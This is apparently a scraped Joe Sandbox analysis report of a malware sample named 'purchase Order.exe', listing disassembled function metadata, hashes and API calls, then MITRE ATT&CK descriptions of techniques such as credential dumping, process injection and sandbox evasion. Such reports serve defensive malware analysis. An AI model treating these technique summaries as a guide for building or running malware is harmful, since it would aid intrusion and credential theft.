Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: 8dd31e5f81938de00f2b5628ad07ce2c821242663a4e77abb667d674efaec4b0
Instruction ID: 3612638ca05567f1d1a775427498268ee90b1a6fcde44b9f3b9d21b195ea7d35
Opcode Fuzzy Hash: 8dd31e5f81938de00f2b5628ad07ce2c821242663a4e77abb667d674efaec4b0
Instruction Fuzzy Hash: 3511E13215020ABBDF118F64CC02FEA3B7AFF09318F150214FA65A71E0C372E861AB60

Function 00CAA587 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 00CAA5D3

Strings

@U=u, xrefs: 00CAA5D3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 58aea3120a1dd43a0faf01455d93e8da817a1ae18b09c892d66f0d3a796d7afb
Instruction ID: 300898036448377a5f6e2873a6e3e3e9a0330e927ef15fb8d1922917e5f173f0
Opcode Fuzzy Hash: 58aea3120a1dd43a0faf01455d93e8da817a1ae18b09c892d66f0d3a796d7afb
Instruction Fuzzy Hash: BE11A930500745AFDB20CF24C8A1AEABBE8BF06318F14891DE9AB87291DB716941DB60

Function 00C9A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C9A84E
htons.WSOCK32(00000000,?,00000000), ref: 00C9A88B

Strings

255.255.255.255, xrefs: 00C9A866

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: f10438c2796951adb4eaec494aaef9c67aa0ecc33499fe7f7d5b4e4c6d9487af
Instruction ID: 0e62dcc4cec65f5f000a762a153366bcd043a5816106eb1160626cdf40f33464
Opcode Fuzzy Hash: f10438c2796951adb4eaec494aaef9c67aa0ecc33499fe7f7d5b4e4c6d9487af
Instruction Fuzzy Hash: 7501D275200305ABCF11AF68C88AFADB364FF44714F10846AF5269B3D1D771E801979A

Function 00CAF2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00CBE44F,?,?,?), ref: 00CAF344

Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CAF32A

Strings

@U=u, xrefs: 00CAF32A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: 1c2e053fc5ccf70097ea65b188dd8cb1f620519427fb3829543aee5b7a49b83d
Instruction ID: ed187e5cd0ce9c047985cf6a4802e2db3f9b565122638cfbc0d46412ab6bed6f
Opcode Fuzzy Hash: 1c2e053fc5ccf70097ea65b188dd8cb1f620519427fb3829543aee5b7a49b83d
Instruction Fuzzy Hash: 7001D435201204AFCF219F54DC48F6A7B66FB8632AF184628F8561B2F0C772AC47DB60

Function 00C7C65B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7C66D
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C7C69D

Strings

@U=u, xrefs: 00C7C66D, 00C7C69D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: ca48b5bb0b2cfae0ca87be7572cbd08765ced56924f476e4dd5a5a2af521d9cc
Instruction ID: 69b3ab703a3cab68c056f69c03be78b85a40f8a034bf74cc598dcbba25f18fdb
Opcode Fuzzy Hash: ca48b5bb0b2cfae0ca87be7572cbd08765ced56924f476e4dd5a5a2af521d9cc
Instruction Fuzzy Hash: 19F0A071280308BBEB116E90ECC6FBA7B28FB04791F108429F74A1A1D0CAE25D11A760

Function 00C7C7D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7C2DE: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C7C2F7
Part of subcall function 00C7C2DE: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C7C331

SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00C7C7FC
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C7C80C

Strings

@U=u, xrefs: 00C7C7FC, 00C7C80C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: c3ca550179741d7945908cd8cd8f1ed298fa3e81ea917a2682cf8d132a17665c
Instruction ID: eea369dd6730cd880964bd651dc5cd206c9599e5a70fb79445f888748be10789
Opcode Fuzzy Hash: c3ca550179741d7945908cd8cd8f1ed298fa3e81ea917a2682cf8d132a17665c
Instruction Fuzzy Hash: B2E0D87524430A7FF7151A61DC8BFA73B6CEB48751F11843DF70455091EEA38C11A520

Function 00C87744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C87762
_wcscmp.LIBCMT ref: 00C87774

Strings

#32770, xrefs: 00C8776E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 6bc83b2c771fe7a697f258a400b807a6fb7266011760469e377768c83d433c33
Instruction ID: 3b9d94e6d6590a71bb7a048eb879fce818891a90d670cf5221dc24a3c08f20ca
Opcode Fuzzy Hash: 6bc83b2c771fe7a697f258a400b807a6fb7266011760469e377768c83d433c33
Instruction Fuzzy Hash: 8BE0927760432867D720EAA5DC49F9BFBACAB51764F04012AF915D3141E670E601C7E4

Function 00C7A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C7A63F

Part of subcall function 00C613F1: _doexit.LIBCMT ref: 00C613FB

Strings

Error allocating memory., xrefs: 00C7A638
AutoIt, xrefs: 00C7A633

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: b011443d03151f0bf8e7d429a18ed23b55a5a72b1b0436240b942520e8460ee0
Instruction ID: 7fc8241ce6ad5aa5ef2757951a232d62672dae290487903d3206f32c0d917757
Opcode Fuzzy Hash: b011443d03151f0bf8e7d429a18ed23b55a5a72b1b0436240b942520e8460ee0
Instruction Fuzzy Hash: 1FD02B323C031833C32436A86C07FCC354C8B04B52F080036FF0D955D349D38A8051DA

Function 00CBAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00CBACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00CBAEBD

Strings

WIN_XPe, xrefs: 00CBACD3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: c00296ef8fd53a9ab4fc1b3da14acd60ab72fac4272a79d955d9aa4738a1fb79
Instruction ID: fcb9479196ec4bb68b7de71ef354fec7b86636925ff7a10bcb7b49d1bf53dde0
Opcode Fuzzy Hash: c00296ef8fd53a9ab4fc1b3da14acd60ab72fac4272a79d955d9aa4738a1fb79
Instruction Fuzzy Hash: 7BE0C970C00659AFCB11DBA9D948AECFBB8AB58301F148096E192B2660DB715A84DF66

Function 00CA86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA86E2
PostMessageW.USER32(00000000), ref: 00CA86E9

Part of subcall function 00C87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0

Strings

Shell_TrayWnd, xrefs: 00CA86DB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 63ec04863406477db128aed8f8ae397ef2b07908facc43582ac2f57545f1dbc7
Instruction ID: f554b3d8fcfebdeaa1c0fb81f7d6d7b2fb251859e8ff13360e2a048d46799e38
Opcode Fuzzy Hash: 63ec04863406477db128aed8f8ae397ef2b07908facc43582ac2f57545f1dbc7
Instruction Fuzzy Hash: D3D012717853587BF2687770EC4BFCABA189B48B11F110925F746EA1D0C9F0E940C759

Function 00CA8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CA86B5

Part of subcall function 00C87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0

Strings

Shell_TrayWnd, xrefs: 00CA869B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f90ee39a673db1c4cf04655ea500657b24df162150ee1dfca5f4dc9df87fed3d
Instruction ID: 65799906c7da3e2b2da9b4aef73db169952d0336ef2129ccbab22c53c223e855
Opcode Fuzzy Hash: f90ee39a673db1c4cf04655ea500657b24df162150ee1dfca5f4dc9df87fed3d
Instruction Fuzzy Hash: 46D01271788358B7E2687770EC4BFDABA189B44B11F110925F74AAA1D0C9F0E940C754

Function 00C7BD49 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C7BD55
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00C7BD63

Strings

@U=u, xrefs: 00C7BD55, 00C7BD63

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 8a8c31eab103600959a8d281e2c7ca8b6ee49f80b9f43cadf68f6b8924e381ab
Instruction ID: 301153829b9682b8c8fc6aa7772e9b75aaf6cf43cb83365a7fc634189708d4aa
Opcode Fuzzy Hash: 8a8c31eab103600959a8d281e2c7ca8b6ee49f80b9f43cadf68f6b8924e381ab
Instruction Fuzzy Hash: 6BC00271140584BAE7211B77EC0DE4B3E3DF7CAF51715056CB256950A586660056D634

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report purchase Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

